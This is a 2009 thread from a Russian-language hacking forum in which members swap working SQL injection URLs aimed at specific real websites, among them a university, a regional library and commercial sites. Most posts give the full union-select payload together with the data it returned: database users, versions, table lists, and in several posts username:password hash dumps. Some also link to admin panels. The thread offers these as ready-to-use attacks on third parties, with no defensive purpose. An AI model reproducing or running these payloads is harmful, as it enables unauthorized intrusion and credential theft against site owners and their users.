HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.08.2009, 02:05
mr.gr33n
Banned
Регистрация: 06.07.2009
Сообщений: 74
Провел на форуме:
437317

Репутация: 209
Отправить сообщение для mr.gr33n с помощью ICQ
По умолчанию

Код:
PR:4 ТИЦ:40
http://www.meteo-nso.ru/news.php?id=-96+union+select+1,concat_ws(0x3a,name,psw),3,4,5,6,7+from+meteo_users--
 
Ответить с цитированием

  #2  
Старый 01.08.2009, 09:09
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Один из престижных универов г.Уфа

http://www.mf.rusoil.net/index.php?module=content&id=35+union+select+1,conc at_ws(0x3a,user(),database(),version())--

mf@localhost:mf:4.1.16-nt
 
Ответить с цитированием

  #3  
Старый 01.08.2009, 12:52
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Знаменитый surfjunkey

Цитата:
http://www.surfjunky.com/gethelp.php?q=-10'+union+select+1,2,unhex(hex(concat_ws(0x3a,user (),version(),database()))),4,5,6/*
surfjunky@68.178.158.204:4.1.10-standard-log:surfjunky_com_-_surfjunky
 
Ответить с цитированием

  #4  
Старый 01.08.2009, 16:28
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

Мурманская областная научная библиотека

Код HTML:
http://www.mgounb.ru/?folder=1&menu=43&content=-414+union+select+concat_ws(0x3a,user,password)+from+mysql.user--
PR: 7 ТИЦ: 400
 
Ответить с цитированием

  #5  
Старый 01.08.2009, 21:14
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Инъекция в операторе UPDATE, POST-запросом:

Код:
http://wblist.ru/partner/
Регистрируемся тут с любыми даными.

Код:
http://wblist.ru/partner/p-editacc.php
Заходим сюда и пишем по очереди в любое поле:
Код:
toor',ICQ_partner=user()/*
toor',ICQ_partner=database()/*
toor',ICQ_partner=version()/*
Смотрим в поле ICQ по очереди:
Код:
tests@localhost
tests
5.0.26

Последний раз редактировалось mailbrush; 01.08.2009 в 21:18..
 
Ответить с цитированием

  #6  
Старый 02.08.2009, 01:36
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944

Репутация: 37
Отправить сообщение для ZARO с помощью ICQ
По умолчанию

http://kulinarnayakniga.ru/search/?action=index&text=aa%27%29+union+select+1%2C2%2C3 %2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14% 2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2F*

нашел кол-во полей - 24. 3 поле активное. aa') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22/* запрос в поиске сайта


-------------------------------
список всех таблиц ---> http://kulinarnayakniga.ru/search/?action=index&text=aa%27%29+union+select+1%2C2%2CT ABLE_NAME%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2 C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22+F ROM+INFORMATION_SCHEMA.TABLES%2F*

Последний раз редактировалось ZARO; 02.08.2009 в 01:51..
 
Ответить с цитированием

  #7  
Старый 02.08.2009, 02:11
mr.gr33n
Banned
Регистрация: 06.07.2009
Сообщений: 74
Провел на форуме:
437317

Репутация: 209
Отправить сообщение для mr.gr33n с помощью ICQ
По умолчанию

Код:
http://www.dop.ru/news.php?id=-96+union+select+1,2,concat_ws(0x3a,user(),version()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--
http://www.dop.ru/admin/
Код:
http://www.pushcar.ru/dilers/news/news.php?id=-96+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version()),0,1,2--

Последний раз редактировалось mr.gr33n; 02.08.2009 в 02:23..
 
Ответить с цитированием

  #8  
Старый 02.08.2009, 07:59
mol0t
Познающий
Регистрация: 08.07.2009
Сообщений: 43
Провел на форуме:
1369392

Репутация: 262
По умолчанию

Код:
http://www.sns-uk.co.uk/news/news-full.php?newsid=-12625+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
eurohs:5.0.45:eurohs@server213-171-218-205.livedns.org.uk


Код:
http://www.thewebaholic.com/news/readnews.php?id=105+union+select+1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7--
thewebaholic:5.1.30-community:thewebaholic@127.0.0.1


Код:
http://www.koreasarang.com/readnews.php?id=-767+union+select+1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
ks_db:5.0.51a-24+lenny1-log:koreasarang@localhost


Код:
http://www.kickbacksystems.com/readNews.php?id=-22+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7--
kickback_sales:5.0.81-community-log:kickback_kickbac@localhost
 
Ответить с цитированием

  #9  
Старый 02.08.2009, 13:06
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

PR 4
Код:
http://www.cath.com/index.php?cmd=1&id=-1039+union+select+1,2,3,version(),5,6,7,8,9,0,11,12,13,14,15/*
Database Version: 5.0.37-log
Database name: catholic
User name: catholic@localhost
 
Ответить с цитированием

  #10  
Старый 02.08.2009, 15:13
Metis
Новичок
Регистрация: 29.11.2008
Сообщений: 6
Провел на форуме:
177127

Репутация: 29
По умолчанию

http://perfectbonus.com/

http://perfectbonus.com/directory/viewListing.php?listID=[sql]

http://perfectbonus.com/directory/viewListing.php?listID=-4+union+select+1,2,3,4,5,6,%207,8,9,10,11,12,13,14 ,15,16,17,18,19,group_concat(userName,0x3a,passwor d),21,%2022,23,24,25,26,27,28+from+users--
Users\Passwords(Hash)

http://perfectbonus.com/directory/admin/ Admin Panel

DataBase: pokerDir
Version: 5.0.37
User: dirUser@localhost
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ